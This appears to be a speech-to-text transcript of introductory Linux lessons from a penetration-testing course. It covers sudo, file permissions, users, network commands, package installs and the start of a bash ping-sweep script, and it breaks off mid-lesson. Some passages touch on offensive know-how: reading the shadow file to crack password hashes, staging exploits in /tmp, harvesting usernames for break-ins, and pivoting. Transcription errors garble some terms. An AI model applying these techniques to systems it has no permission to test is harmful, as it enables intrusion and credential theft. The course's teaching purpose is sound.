administrator of the machine now we're running as a user called cali so we don't have root privileges directly this is as an improved security feature because we should be running only certain commands when we need to as the root user so we're going to see is we're going to see how we can run commands as an elevated privilege we're going to do that with sudo which stands for super user do they just kind of shortened it so we just have sudo now okay now with sudo what we're doing is we're saying hey i want to run a command elevated i want to run this as a higher user in this instance we can say i want to run the command as root why is that important well let's take a look at an example let's say that i wanted to look at a very sensitive file now one sensitive file in our system is the etsy shadow file you can see cat etsy like this etsy shadow and you don't have to follow along right now you don't have to really understand what's going on if you've never seen linux all i'm doing is saying hey i want to print out this file i want to look at it okay and for here i can't see it it says permission denied you don't have the access to see this file that's a good thing but if i was the root user or somebody that had elevated privileges i could see it so i could say sudo cat etsy shadow like this okay and it's gonna say what is your password for cali i'm gonna go ahead and say cali k-a-l-i hit enter and now i can see that i have access to this file and this file is very sensitive we'll talk about this later on in the course but sends it a file okay so when we're looking at it i ran that command specifically as the root user as the root user i'm able to see okay this file now why or what's going on here well we're running that specific command right and we're still staying as cali we're doing this in a kind of one-off scenario so there will be times where something that you run in this course might require sudo or you can run the command without sudo but you notice something doesn't work so best practice for this is saying hey let's go ahead and just run mostly everything that i'm showing you command-wise in this course that's not best practice overall usually you should run things just as a regular user if you get permissions blocked then run it as sudo as necessary now the other thing to point out and we'll talk about this again in later on in the course but why can we do this is because this user is part of what's called a sudoers file meaning we can have this permission not any user can come in here say we made a new user and we just call the user john we can't just take john and just go ahead and just run these commands as root no john has to have the permission to do this so you can think of cali as being an administrator but only when we utilize that access or that privilege okay the other thing i want to show you though is that we can switch over to root if we want to we can come in here and we can say sudo switch user dash just like that and that'll put us into root now you can see okay we're running root at cali and that's only for this instance you can if you want i'm not going to demonstrate how to do this but you can if you want change the root password log out and log back in as root and run through this course as root again that's not best security practice but that feature is available to you if you are a linux user that is comfortable with linux comfortable with running as root and you want the easy path otherwise i highly recommend just staying as cali running as pseudo privileges as you need it and then moving forward but this is a quick way to switch into root if you need to sometimes even running sudo causes some issues so switching to route to run a command is okay what we can do here too is the demonstration is we can go file new tab and look at a new instance and you'll see that this instance of root is only good for this tab here once we start a new tab we're going to be brought back right back to cali cali you can see that from the top line in the tab as well so just keep note of this when you're running commands in this course if you see something again try running it with sudo if it's not working or if it says access denied then you know hey i need to run sudo very very very important okay i'm trying to drive that in into your brains right now so from here we're going to move on we're going to start looking at how to navigate around the file system taking a look at everything from a bigger picture and diving into terminal so i will see you over in the next video okay so now our first lesson in linux terminology is going to be navigating the file system so if you're a windows user you're used to navigating your file system probably through folders through a gui so a graphical user interface well in linux we can do that but the majority of time we're going to live in this terminal here so we really need to know how to get around so the first thing we can do here is we can say hey where are we at and that's pwd so that stands for present working directory so you type that in you hit enter and it says okay we're in the root folder so we know that we're in the root folder but how do we get out of the root folder we can use a command called cd and that stands for change directory so if we want to change directory backwards we just type in two dots here and now we can say okay where are we at so we're in a slash so we're just in a home folder here or just there our generic slash folder right so what we can do is well how do we know can we go backwards from here let's keep trying so we do pwd again no we can't this is our base folder right so you have to think of this as the the lowest you can go so now how do we move around how do we know how to go forwards again well we don't know what's in our directories right so we're sitting in this the slash folder and how do we look around so there's a command called ls that lists everything that's in the folder so if we say ls we kind of see this color coordinated here and the color coordination it just depends on if it's a folder if the folders read right you know there's permission settings which we're going to get into later but the majority of these here are folders okay well we know we just came out of root so we can go back into root now how do we do that so we can say change directory root and we can actually hit tab to auto complete i don't know if you caught that but there's no r any folder besides root so at r i can just hit tab and it should type it out for me oh i lied there is a run in here somewhere but it's hidden we're going to cover that soon as well so ro hit tab autocomplete can change directory into root so let's ls and root and see what's in here okay this is more like our home folder right so we've got desktop documents downloads this is kind of what applies to the root user so what if we're sitting in this root folder here and we wanted to access instead this etsy folder well could we do the same etsy command here well i'm hitting tab and nothing's happening well because etsy doesn't belong in this area right but if we put a forward slash in front of it because this is the base and then we hit etsy there now we can navigate to the etsy folder and we can actually double tab and see what's all in the etsy folder like an ls say no another way to do that is if we wanted to ls what's in the etsy folder without navigating to it we could just type ls etsy and you can see everything that's in here so there's some some tricks that we can do right so we don't have to actually navigate to the folder to know what's in there again if we ls and we want to know what's sitting in videos or even let's say what's sitting in desktop for our folder well if we start typing desktop and hit tab we can't do that either because everything in linux is case sensitive so if we start typing desktop and then hit tab now we can ls and see what's in there so our vmware came with a couple of shell scripts here that are automatically placed on our desktop if we wanted to confirm that you could see that they're both right here so as of right now we are just sitting in our root home folder and we know how to navigate around so if we wanted to go to desktop we could we could hit ls now and see what's in there if we wanted to go backwards we could okay now we're back in our our root folder and you can also tell where you're at your present working directory sits right here right so this little atilda is actually your home folder and you can see that we're in desktop so if we wanted to go back into our desktop instead of typing say you wanted to go to music from your desktop instead of going root music which will work you could also just say i want to go music and that will put you there as well and notice you don't need the leading forward slash when you use the atilda so just some couple interesting tricks that you'll kind of pick up along the way tab is definitely going to be your best friend if you run into something with multiple options say you're trying to cd and you say i want to go to my desktop and you're tabbing it's not working you can hit double tab and then it'll show you okay well there's desktop documents downloads those are your three options that start with the d so now you kind of have an idea as to how to kind of move around but let's do a little bit more so what if we want to make our own folder well there's something called make directory mkdir so if we say make directory we'll say i'm just going to use my name heath so now if we ls we can see that this heath folder is now here we can go into the heath folder and there should be nothing in it right so we can go back and we can also get rid of the heath folder remove directory heath if we alice again it's gone so now what else can we do well we can also look for hidden folders so we can say ls-la and we can look for hidden files and folders here remember the color coordination so this dot cache right that in theory is a hidden folder so if we say cd dot cache we can go into there we ls and there's actually some some information in there but when you saw it originally you didn't see that we're going to cover more on this i just kind of want to show you that trick as you see over on the left side there's file permissions and properties so be aware that just because it looks like something's not there doesn't mean it's not there it might just actually be hidden similar to windows where you have hidden files and folders so just a quick trick to show you that so another thing we can do so let's go back and don't worry about what i'm doing here you're going to cover these commands in a little bit i'm just going to echo hi and we're going to put that in a test dot text folder so now if we ls you can see that test dot text is here so if we want to actually copy this file we can copy this file to another location so we can say hey i've got this test.txt but i actually want to move it to downloads and if we go ls to downloads you could see that test.txt is actually sitting in there and if we wanted to remove it we can just say remove from downloads or test.text actually sorry remove downloads test.txt we don't have to transition into that directory if we don't want to so another trick say we want to see now that it's gone and we want to ls but we want to keep typing this out if you hit the up arrow now you can just see your old commands so if you keep typing a command over and over you can see what's going on so ls shows that there's nothing in downloads now we were able to successfully remove that file so another thing that we can do is we can actually move so say we wanted to move test.txt and we wanted to put that into downloads okay now if we ls test.txt is now gone from this folder because we've moved it we haven't made a copy we've actually physically moved it away so now if we ls actually let's just tab up you can see that test.text is now in there and i'm going to remove that here okay and now the last thing i want to show you is the locate feature so if we wanted to locate a file say i wanted to locate bash let's see so we're looking for a file and we're going to get more specific along the way but if you type in locate you can kind of look through a system to see if you can find it now i'm looking for say any type of bin bash or binar bash that's fine that's really what i wanted but it shows you everything with bash in it now this might not work right away what you might need to do is update the database so you type in update db it updates everything for you and then you can use locate again so it has to build that database of the information that it's finding in order to locate what you're searching for so make sure that you use updatedb sort of frequently okay so two more things i want to show you and then we'll close out this video and move on to the next one so an important thing you want to do with your new account is we're using a default password and that's not very secure so to change a password for our user we can just type in pass sswd and now it's going to ask us for a new password so instead of using tor we can use something else i'm going to type in the very secure password as my password for an example here but if you plan on using this machine for future reference you can type in a secure password and kind of keep it so lastly i want to show you is something called man so man pages man pages are your instructions for any command that you're running most commands come with a man page so let's say we want to look at ls we can say man ls and then it's going to give us all this information here about ls so if you see it says ls is list directory contents awesome and then it gives you what options we can do well we can do a dash a for all which you saw earlier and you can kind of scroll through here and just see exactly what it has to offer and that's kind of it so when you go through here um you can kind of you know if you're struggling to like you know there's a command in there but you're not sure exactly what the command is you can type in man and search it and sometimes you can do ls i don't know if this is going to work but dash dash help and you get some information as well it doesn't provide you the full man pages but it provides you something pretty close so that's kind of just your way around if you ever get stuck something to look for okay so that's it for this lesson next we're going to move on to users and privileges how to add users and how to uh how to change some pseudos and some modifications to our file permissions okay so now we're going to cover users and privileges so in the last video we touched a little bit on privileges with our ls-la and we touched a little bit on users by changing the password of our root account so now we'll cover a few more commands regarding those so if we look again at ls-la you could see all this crazy jumbled wordage over here right so it actually means something so we look at the first line here if we see a dash like this a hyphen that means it's a file if we see a d that means it's actually a directory and then you see rw and x so rw and x actually means read write execute it's the permission settings that this particular group has now there are three groups here there's the first second and then your third right here right so your first group right here is the owner of the file so it looks like the owner of the file has full read write execution right and then the next set of three here is actually the permissions for the members of the group that own the file so this is a group ownership as opposed to actual ownership here so for the people that are in the group that has access to this file they can only read and execute they can't write to it now for the last one this is just all of their users so any common user here can actually just read and execute they can't write the document so that comes into play especially when we get into penetration testing because with penetration testing we're looking to have full access right so we're always going to be looking for that folder that has full read write typically if we look at temp that's our temp folder a lot of times you see the temp folder has full read write execute so when we're doing penetration testing we're trying to upload some sort of exploit we might actually upload it into the temp folder because that's where we can execute those those files however we could also be looking for other full read write execute files where we need to modify them and give us root access to a system so it's all about insecure configurations and we're going to cover that more once we get into the actual penetration testing part of the course so for the linux essentials part of the course all we need to worry about is these file permissions another important feature of that is if we were to create a script our script's not going to be able to run until it has full access so how do we change access here so let's make a file i'm just going to make we'll just echo another text document right so we'll just say hello and actually i typed that in backwards so hello and we'll call it uh hello.txt so if we ls here by default we only have read write and then read access for everybody else meaning if we wanted to read it we could say cat which we're going to get into later cat hello dot text it just says hello so what can we do here well we can use something called change mode in changing mode is chmod and we have a couple options here so we can do a plus right and we could say well we want read write execute or we just want execute um but another way i like doing it is you have a number feature so the one you really need to know is all sevens sevens gives you full read write access across the board so if we say chmod 777 hello.txt now we ls la and you notice that hello dot text turns green that means it is full read write and here you go we've got the dash here saying it's a file and we've got read write execute across the board so this is how we change file permissions you don't need to necessarily know about the other numbers in terms of penetration testing it becomes more in terms of configuration and security management of files if you were to get down that path so to stay on the easiest path just remember 777 or plus x will work as well so changing the mode is is critical and we're going to cover it time and time again throughout the course once we get a little bit deeper so a couple more things we need to talk about say we wanted to add a new user well there's a feature called add user so we say add user and one or two names is allowed so we need to add user say john okay so it made something for john let's give him a password give him a password again and we'll just hit enter for the defaults it's all correct okay so we now have a username john and we can confirm that we can actually cat the etsy password file here and you see down at the very bottom we have this user john so this etsy password file you're going to become very familiar with because it shows you all the users now this will there's a lot of times where you're doing penetration testing you're going to have access to this etsy password file because it doesn't provide the password anymore it used to a long time ago passwords are now in the shadow file so you actually have a little bit of access and information disclosure here at the hands of poor configuration so you see that i've created a user john well that gives us a little bit of information say there's ssh on a machine or something else we can use that username of john to try to break into the machine so we'll cover that again later but if we wanted to see what the etsy shadow file looks like now we come in here and you've got these these uh jumbled stuff here right so it's just a hashing format so what we're doing is we can actually use a tool like hashcat to break this down and crack these passwords now a password a password will be very easy but just know that if you have access to the etsy shadow file you have a good chance of cracking a password depending on your capabilities and depending on the strength of the password that'll allow you access to a machine so something to think about there okay so now we have our user john let's go ahead and switch to him so we can use something called su which stands for switch user and we'll say switch user john okay so automatically gave us john here let's see if we can switch back to root okay we can't just switch back to root because we need root's password right so we can type in password and that works but if we didn't know the password then we'd be stuck on john we were able to access john because we were already root so this comes into play in terms of users let's go back to john here now if you're a user you have to be able to do certain things you need permission to do certain things i should say right so root has full access and permission to do everything but john we just created john john doesn't have any sort of access so if we wanted to um if we wanted to change the password say we want to change the password for for root i can't modify the password information because i don't have that kind of access now there is something called a pseudo which would provide john that access if we gave it to him so it's called a sudoers file and basically anybody in that sudoers file can change permissions given if they are a pseudo user right so we would type in sudo password root and it's going to ask for the password for john but you're going to notice hey john's not in the pseudor's file john can't do this so john has base permissions right and we're going to counter that a lot of times in penetration testing where if we get in we'll get something called lower privilege and we'll get an account like john and we're going to try to escalate into root but we just can't do it you know the chances of doing a doing that and having a john in a pseudoers file is just not high it's possible but it's not likely so for now just know that if you want a user other than root to have access to file permissions you need to have them in the sudoers file that becomes useful too in penetration testing because you can look at the sewers file if you have access to see what users have pseudo privileges okay so that is it for this lesson in the next lesson we're going to be covering network commands and moving on gradually towards scripting so let's go ahead and get there and i will see when we get over there okay so now let's cover network commands so the first command i want to cover is ifconfig so you may be familiar with the windows version of this which is ipconfig and they pretty much do the same thing so it shows you here your different uh interface types and the ip address associated with them so each zero here ethernet zero has an i p address of 192.168.132.164. you can see the net mask the broadcast address and you can see the mac address as well and we also have a loopback address here now if your machine has a wireless adapter or at some point you want to do wireless penetration testing you're going to need iw config and you should not expect to see anything on this at the moment unless you're using a laptop then you actually might see a configuration down here for it if you would see something under iw config you would see like a wlan 1 wlan 0 something along those lines okay and another common command that we're going to see is going to be the ping command so we can just type in ping and the address that we're trying to talk to so for example i'm going to try to ping my home router and i get talking back so if i tried to ping something that wasn't in my network like a 16.1 you're going to see the results change so with ping here ping is going to be endless until we hit something like control c to stop it it'll ping forever so i'm going to hit ctrl c again and kind of show you the difference so you see that we attempted to ping here and we got replies we got information back well that's good that means we're talking to the other machine it says hey are you there it says yeah i'm there and we try to ping this machine here but this machine's not talking back it could mean that the machine is on the network or that the machine is just blocking icmp traffic icmp is a another word for ping so moving on to the next command i want to show you arp so the best way i like to type in is arp with a switch of a and arp is just going to show you mac addresses that it talks to and the ip address actually i said that backwards it's going to show you the ip address it talks to and the mac address associated with it so if an iep address reaches out say 192 168 15.1 talked out to this machine it's going to say okay hey who are you it's going to send a broadcast message out to say who has this iap address and then the iap address will respond it says hey i do and this is my mac address so arp is just a way of associating iap addresses with mac addresses and once you know that you can also look at netstat so netstat ano is another one of my favorite commands and this shows you just the active connections that are running on your machine so if you scroll way up and you can just kind of see what's open and where what's talking here where this really comes in handy on a penetration test is to see if a machine is talking to somebody else same thing with arp you want to know what that machine is associated with and is it talking to something on a port so this is more just internal right now but it's still good to know so for example if i were to open up a firefox page and connect out to the internet then i went and i did a netstat again i would see information about that port being open and and that i am going out with it so just kind of keep that in mind these are not commands that you really need to know in depth right now networking does come into play when you are doing penetration testing but we're going to cover these commands time and time and again i just wanted to give you a very uh brief introduction to them okay in the last command that i have for you today is route so if you type in route that's going to print your routing table in the routing table is important because it tells you where your traffic exits essentially so for this vm my traffic is exiting on 192.168.134.0 um so any traffic goes out of this 0.0.0.0 gateway in this range right so when it goes out this gateway it's doing gnat so network address translation and it's running off my computer so the best examples aren't here but it's important to know route as well because there could be a machine that you're attacking that has multiple routes so you might see a 134 and a 135 because it has a dual home nick that meaning it has two nicks inside of it so it's actually talking to a completely different network that you didn't know existed so you might have been attacking one network on the 134 range and then 135 is just out there and this computer can talk to both and until that point you had no idea and that's the idea of called pivoting when you switch a network from one to the other but you're using a machine so that's it for this lesson in the next lesson we're going to talk about viewing creating and editing files so in the last video we took a look at different networking commands in this video i want to show you some updates to those commands now we were running ip or ifconfig so we were doing ifconfig and that works and that's fine although it is becoming deprecated so it is still my go-to if i'm being honest with you because i like to stay old school but i do need to show you the new and improved version of ifconfig so if we take a look i'm just going to clear my screen here so the command is ip now we can say ipa and we can look at that and that says ip address and what do we get here well we get our loopback and we get our ethernet and we still get to see what our ip address is we get to see what our subnet mask is here as well we get to see our broadcast address so there's a lot of information here that is provided which is good we can also take a look at some of the stuff that i was showing you before so say we want to look at the arp table we can say ipn which stands for neighbor let me clear this and here's our arp table okay so very similar and we want to look at routing tables we can just do ipr so instead of having to remember okay arp or we're having a look at route okay we can do all of this through one command which is the ip command so i just wanted to add this updated video to kind of show you that there is this command out there this is where the industry is moving this is something that you should know but it is perfectly fine in my book if you still want to use ifconfig nothing wrong with ifconfig nothing wrong with using ipa both are fine okay so just another command for your repertoire and for your toolbelt and something to keep in your back pocket so with that being said we're gonna go ahead and move on to the next video all right so second to last video here in our linux series and this one is a very important one so we're going to cover a few things i want to cover how to install files how to install updates and how to get files from github all these are going to be very important and things that you're going to encounter as a pen tester all the time so from a linux perspective let's say that you want to update your system and you're in the terminal well what you can do is you can say something along the lines of apt update and we'll say also apt upgrade when you're done with that so what this is going to do is this is going to go out and you can see these archives.linux i'll scroll back up here and all these tools need to be installed but this archive.linux.edu so this is what's called a repository so we're going out to these repositories and we're saying hey what's been updated lately and what do we need to download and you can see okay these packages that are automatically installed no longer required we can auto remove them if we need to and then we have all these new packages that need to be installed if you look through the list it's quite a bit and then we've got the the packages that'll also be upgraded through here as well so we have all these updates upgrades et cetera if we want to perform this it's going to take up 871 megabytes of additional disk space and it will probably take a little bit of time to download upgrade etc so if you want to do this go ahead and push your update you absolutely don't have to to be successful in the course but just to provide clarification and understanding of how it's done and what it's doing just wanted to point that out now let's say we just wanted a tool a specific tool you see all these things in here a lot of them are related like python which is interesting because i do want to install a python tool so let's install a tool called pip so what we're going to do is we're going to say apt install and then the tool is called pip but it is python dash pip like this so type that in hit enter it's going to go check for it it's going to look for it and it found it which is great if it weren't to find it it would say something a little different we can show you like say just hit some numbers in there say unable to locate that package so you'll know you're on the right track with the package name here so i'm going to go ahead and actually hit yes to install this it's going to go out and download everything we need for pip and you're going to see why pip is important here so there is pip and there's pip three now both of those go out and do some installs for us and we're gonna go ahead and just say yes and those installs are related to python so we're going to use a lot of tools in this course that are related to python and it's going to install those tools for us so pip is for for python pip 3 is for python 3. now python 3 is the latest and greatest python 2 is actually being deprecated in 2020 or end of service in 2020 so a lot of things are actually moving away from that now so when we get into the python section of the course we're actually going to be working completely in python 3 for this reason solely so while we wait for this let's go ahead and go out to the interwebs and i'm just going to applications up here and then firefox terminal so from here as an update to the course i want to introduce a tool and teach you also how to install a tool so this is kind of serving two purposes here so i want to go out to google and what we're going to do is we're going to look for a tool called pimp my cali p-i-m-p my cali just like that now this is written by a guy named dewalt he is a pillar of our community in terms of our discord community he's very helpful when it comes to the course if you've ever been in the course discord or looked at it you will probably see that he is a part of it and he's there and he's helping out he's fantastic now this is up to date he does a great job of utilizing this and what he's done is he's taken the new kali linux which anything from 2020.1 and onward has kind of had some issues here or there and he's created a nice script to fix all of those issues okay so we don't have to go through and troubleshoot a lot of things throughout the course this script just kind of goes in and fixes a lot of things that were wrong so i really am appreciative of this script because it is fantastic what we can do is learn from this as well though so what we can do is we could take this code and we could just copy it here okay we can hit control a control c or you can hit copy on the clipboard and what i want you to do is i want you to go out to a terminal we're gonna go ahead and just sudo switch user okay and enter in our password now we're going to install something from github so what we're doing and this is very common by the way you're going to see this happen throughout the course we're going to put this into a folder so what i want to do is change directories to a folder called opt opt just like this and hit enter and we're going to put our file here now this is very common a lot of people tend to put their their downloads or installs into the app folder it's just a place to keep all these so this is a common thing to do and a good practice to get into if you've never done this before so now what we're going to do is we're just going to type in git clone and then we're going to paste it so you can do ctrl shift v as a shortcut or right click and paste hit enter and you can see it started cloning now once it's done cloning all you have to do is change directory into the file name right here or the folder name so cd we'll just type in pimp my cali tab hit enter okay and from here we can just do ls look what's in here okay so you can see pimpmykali.sh we're gonna go ahead and just run that so dot forward slash pimpmycali.sh just like that hit enter all right and we're going to run zero here okay and this is going to take a minute so it's gonna go through and run all these upgrades that you see here so what it's doing is it's fixing some of the issues that we have so we're fixing go when we have to install go later we're fixing impact which has some issues on its own in 2020.1 and later and we're also enabling root login so there's a lot of things that we're doing here that help us out throughout the course and it's just a nice overall upgrade there are some other features here so as you'll see we have the ability to downgrade from metasploit six so if you do encounter issues in the course you can come back and downgrade to metasploit five which is what we are currently doing um but as you go through the course metasploit six might be working or more functional as these tools upgrade and things go on you know you have to kind of evaluate what's working what's not working and take it from there so as the script gets updated constantly be on the lookout for these things as they get added or removed but for now we're just running the xero we're going through and just adding all these different tools in you should see it scrolling along like this and should function pretty pretty straightforward so go ahead and let this install the big takeaway here and once once you're done go ahead we're going to move on to the next video but the big takeaway here is that you should be comfortable with using the apt package to go out and download tools you should be able comfortable with upgrading your system through apt and you should be comfortable now with going out to the web github at least and going and downloading a folder or cloning a repository off of github and installing it on your own it's very straightforward if the github is good the github will tell you hey here's how you install it and it'll say these are your instructions like right here it says here git clone cd into it dot forward slash put my cali straightforward and most most githubs are like this so as we download tools from the course you're going to get more practice with this and understand it better but from here you're going to just take it and go and here you can see something that we talked about is that we are lost the ability in 2020.1 to use root this will allow you to run root in cali if you want here we're just going to type in no unless you know what you're doing you could type in yes but again as stated in the pseudo video if you are not familiar with linux it's best practice just to keep hanging out in sudo and utilizing it that way as a low-level user and again we're just going to let this run and i will catch you over in the next video so there's one more tool i want to install because i use it quite a bit throughout the course as my go-to note editor and i'll talk some alternatives as well but i just want to make sure that you have it installed and you have it at your disposal if you want to use it it's not the only text editor in linux and i'll show you those options but that tool is going to be called g edit so if you just do apt install g edit like this actually let's do a sudo apt install like that enter in our password and then go ahead and just hit enter for yes we're going to let this install and it should be pretty quick now what this is going to allow us to do is just have a text editor option you're gonna see this in use in the next video but we're gonna say g edit test.txt as an example and it'll bring up this text editor plain and simple that's all it is now you'll get some warnings like this if you see a warning just ignore it don't even worry about it as long as you're able to get into the text editor and edit that's fine i'm going to close this out without saving another thing that you can do is you can use mouse pad and just say test.txt that's fine and you can use nano test.txt same thing and you'll see these throughout the course so don't worry about having to memorize them right now but there's a few different text editing options i just wanted to install g edit and show you g edit because i use it so much throughout the course and they removed it from kali linux in 2020.1 i believe so i just want you to be familiar with it and know how to use it if you want to so that's it we're gonna go ahead and move on to the next video okay so this is my second time recording this video the first time i forgot to turn my microphone on and performed for my cat so she approved of it let's see if you approve of it the second time around now that i have a little bit of practice so we're going to be talking today is we're talking about viewing creating and editing files so i've already showed you the echo command if you recall we used echo to create a file right we created a hello.txt and we can just echo hello out to the terminal we could say echo hello and i'll say hello back so what we can do with echo is we can use it to write to a file so if we were to say echo hey and then we write it to hey.text well we can look and see that hey.text is here and you can see my files from the previous one so i'm trying to come up with more ways of saying hello but we're going to use hey.text here so if we cat hey.text all cat does is print out to the screen what is in a file it says hey okay so let's say we want to append cat or we want to append hey.text well we can tab up here what if we just say hey again we've got this greater than symbol here and we're just putting it into the hey.text file well that didn't work we didn't append it we actually overwrote it so what if what can we use to actually over or append this here what we can do is we could say hey again again right just to give us something different and we can add a second greater than symbol here so now if we cap the file you can see that we actually appended to the end of it so this becomes incredibly useful when we are either adding stuff to a list say we're gathering ip addresses and we just want to combine our lists or when we're creating a series of commands and we're going to use those commands to send all at once we're going to cover that later when we talk about file transfers in the penetration testing section where we use a set of commands like this on a windows machine to actually transfer files via ftp it's just so much easier than typing them all in one by one we can create a little document and run the document so this becomes useful when we have a series of commands and for other reasons as well as you'll learn as you go on in your linux career so we've talked about echo and we've talked about cat so let's talk about some other ways to create a file we can use something called touch and just say new file.txt and if we ls you can see that newfile.txt is here but if we cat new file there's nothing in there because we haven't put anything in there yet so there's a few things that we can do we could use echo and append the file right we could also use a tool called nano now nano is a terminal text editor there are other terminal text editors like vi and vim i don't prefer those personally i like nano the most some people have their preferences so i encourage you to play around with any of them as you wish vi and vim are the other two but for this course we're going to be using nano so if i say nano new file dot text i could type whatever i want in here and we're going to be using nano a lot to create scripts to create python scripts and to edit shell code as we get into a little bit of exploit development so i'm going to hit control x i'm going to hit y for saving and then we'll save it to new file.txt if we cat this now it says hey i could type whatever i want in here so that's one way of editing it another way of editing it is using a graphical interface so we can use g edit and say new file and if you don't like using a terminal you're more than welcome to use g edit here just type in new line here and save it and i i like using g edit it's a lot cleaner because i can you know highlight and delete i don't have to use my keyboard to navigate around uh like i do in the terminal so if you have the option to use g edit for sure but sometimes you're going to be on another machine that's not your own or is headless and doesn't have a gui that you're going to have to use nano so get comfortable using both so we save this let's go ahead and cat it out and see what happens okay you can see that the new line is in there so really that's the overview that i wanted to cover so just know that you can create files pretty much using echo touch and actually you can create files using nano as well if you say nano this is new dot text i'll just say hello control x save it you ls you can see this is new.tx is right here so um you can use all of these tools in different ways to create files it's completely up to you how you want to do it personally when i'm creating a file i use nano and i just create a new shell script python script text document that way you could also do it using g edit as well so just uh know that we're going to be using these a lot and try to get comfortable with these and from here we're going to be moving into controlling cali services so we're just going to briefly talk about what services you need running on boot and how to do that last video in the section and this is going to be one of my favorites so what we're going to be talking about is scripting with bash i'm going to show you some cool tricks that we can do to kind of narrow down some of the results that we get and then i'm going to show you how you can automate some of that process and we'll take that and even write out some for loops and one line loops which this might not make any sense right now and that's absolutely okay but by the time the video is done hopefully it does so the first thing i want to show you is i want to show you how we're going to write a ping sweep so we're going to write a pink sleeper basically we're going to go out and say i want to ping a device if that device is alive go ahead and show me that result and we're going to sweep an entire network so what we're going to do first is we're going to identify a device that's alive so we can test this out and then build upon that so you can go ahead and type in ifconfig and then just hit enter now my ethernet here is on a natted network so i'm running through a different uh ip address subnet here so this one is 192 168 57 150. my actual ip address is on a dot 4 dot x here so i'm going to for this example i'm going to be pinging 192.168.4.29 however and you can see here's the ping that we're getting back however if you are unsure of a ip address in your house that is active or your subnet in your house that's okay you can just run 57.1 for this example you might not get a lot of return results however you might only get one or two when we do this sweep so i advise you to figure out what your ip address is that's a good challenge anyway and if you are familiar with networking which you should be at this point then you should be able to determine the ip address of your home network but if you do not do that then you can use 57.1 or whatever your ip address is here on this third octet so that will also work if you see that all right so i'm going to clear this now what are we noticing when we're pinging we're pinging this address and we're getting some data back now if we ping an active address you can see that we get okay 64 bytes from 192.1684.29 it's saying it's active we're getting details back if we were to ping something let me do like 41. where we just don't get any data back okay and let's try this one more time let's try this a different way let's do like a count of one dash c of one will do a count of one it's going to try to send one packet over and see if it works nothing's happening right it's trying to transmit that packet you could see that it's getting zero received here where here is getting four received no data is coming back it's just not doing anything for us so the thing that we can identify here is what's the big difference if we look at line one and two versus line one and two what are we seeing when we get data back well the big difference here is we're well two of them i guess we see that we get this response right that's a big difference and then down here it'll say hey we receive some packets if it's not zero now the easy way to do this is to look at a line that says hey we received data which is this line here okay now what i want to do is i want to narrow this down just a little bit what we're going to say is we're just going to do a ping of one time so i'm going to clear this i'm going to bring it back to this like this i'm going to do a count of 1 and that should just ping once and that's perfect we don't need to ping endlessly we just want to make sure we can ping once and then we're done okay and then from here i'm going to put this into a text file i'm just going to call this ip.txt just like that so when i cut out ip.txt now you can see that i have this file it's stored i don't have to run the command again we're good to go so what we're going to do now is we can take this and then we can start gathering data based off of what we see here so what i want to do is i want to just extract this one line here the 64 bytes from 192 168 4.29 and the best way to do that is with a command called grep so grep is going to look for a specific term or phrase and we can do that and it's going to pull down any line that has that term or phrase so if i say grep here and then i just put in quotation 64 bytes like this now when i cut out this all i'm pulling down is this line and it's even highlighting it for us it's saying here's the line that we see 64 bytes from 192.168. okay so we've extracted just the one line and why am i extracting this line well if we're building out a ping sweeper what i want to do is i want to sweep every single ip within a specific subnet so say this dot 4 right i want to ping 4.1.2.3 all the way through 254 255. i want to see if i can get through all the ip addresses in a subnet so what we're going to do is we're going to ping every single one of them and say hey are you you up are you there and we're going to do it with the count of one and we're gonna say are you there okay and if they're there they're gonna say yeah i'm here 64 bytes here's my response and it's going to say 64 bytes from this ip address so we want to extract the ip addresses to say yeah we're alive that's basically our goal here so when we run this on a bigger scale which is what we're going to do we're going to need to grep out this information and extract this information to where we only just get the ip address back okay so what we're going to do now is we're going to start narrowing down and grabbing this ip address and then i'm going to show you how we're going to take this all in one instance and run it and then extract ip addresses so from here what i want to do is i want to do another command so every time we pipe we're saying hey run this command then with that command run this command then also run this command too so we're going to keep running this command on top of this to narrow things down so here's what we're doing here we're going to run a command called cut and with cut we're going to say i want to cut something out of this we need to provide it what is called a delimiter so we do a dash d like this and the delimiter i'm going to use is a space and then i'm going to say dash f for field and then i'm going to say 4 okay what is this doing well it's saying hey i want to cut this line that you're getting back on a space so the delimiter's a space so here's a space here's a space here's a space and it says i want to count up to 4 to grab that data so 1 2 3 4 right here so if we say 4 here like this we hit enter we're grabbing that specific ip address because we're doing it by spaces if we did it on 3 what do you think we're going to grab we're going to grab the word from so you can see here it's from so what i want to do is grab the ip so we're going to use this cut just like this use our delimiter and then get to the correct field position that we want to grab the ip address all right so we've got the ip address now there's only one thing wrong here with this ip address is that there is a little colon on the end of it we just want this without a colon at all we want it just like this now there's a couple ways we can do this we could use something called said said it's a little bit complicated and a little bit advanced i would say for where we're at right now so i'd rather teach you an easier way to do this and that is called translate so with translate all we're going to do is we're going to do one more pipe like this and we're just going to say tr for translate a dash d for a delimiter again and then we're going to say we want to get rid of this and that's it we're just getting rid of this okay so if we run this one more time now you can see that we've successfully extracted this ip address out that's our goal that's all we wanted to do now how can we apply this to something bigger how can we make this part of a bigger script that is the question and we're going to do that so what i want you to do is i just want you to copy this okay copy this entire line and we're going to go into a mouse pad so let's copy this selection and i'm going to clear my screen i'm just going to say mousepad and we're going to call this ipsweep.sh okay so this is going to be a bash script and i'm going to make this bigger and the first thing we're going to do with our bash script is we have to declare that it's a batch script we're going to say hashbang right here or shebang is what we'd call this forward slash bin forward slash bash this allows the machine to know when we run this this allows bash to know hey we're calling this here's the location of bash this is what we're running with the script you're also going to see this when we we use python as well you'll see the the declaration here at the top or when we're calling this out so i'm going to go ahead and control s and save this that'll add some nice color to this so when we're coding this out we get to see in color i like that a lot i'm going to actually make this a little bit smaller and then make this like this here so we can get the whole picture okay so what i want to do is i want to paste in what we just wrote so i'm just going to ctrl v here and paste that in so we don't need to do a cat of an ip address here in this instance instead we're going to change this back we're going to ping remember we want to ping every device in the network so we want to ping say if we're pinging 192 168 for dot x okay we want to ping that and we can leave this like this for now don't worry about changing anything here this is just going to be a placeholder we're going to do a little bit of extra syntax here to make this work so we're going to write what is called a for loop so we're going to say for and i'll explain what this does here in a second you're also going to see this again when we get into python and coding and so you'll be able to understand more and more about loops and what for loops are while loops etc they're very very useful and very common in coding and scripting so i'm going to say 4ip in and then i'm going to say sequence 1 through 254 now very important this character here is not an apostrophe okay this is not an apostrophe this is the little line i don't know what it's called it's above the atilda next to your escape button on your keyboard so it's this right here okay it's like a backwards apostrophe almost i'm sure there's a term for it i just don't know it so you come in here and you say okay for ip address in sequence 1 through 254 and i'm going to explain what all this does in a second i want you just to type this out for now i want you to say do all right and then i want you to come down here 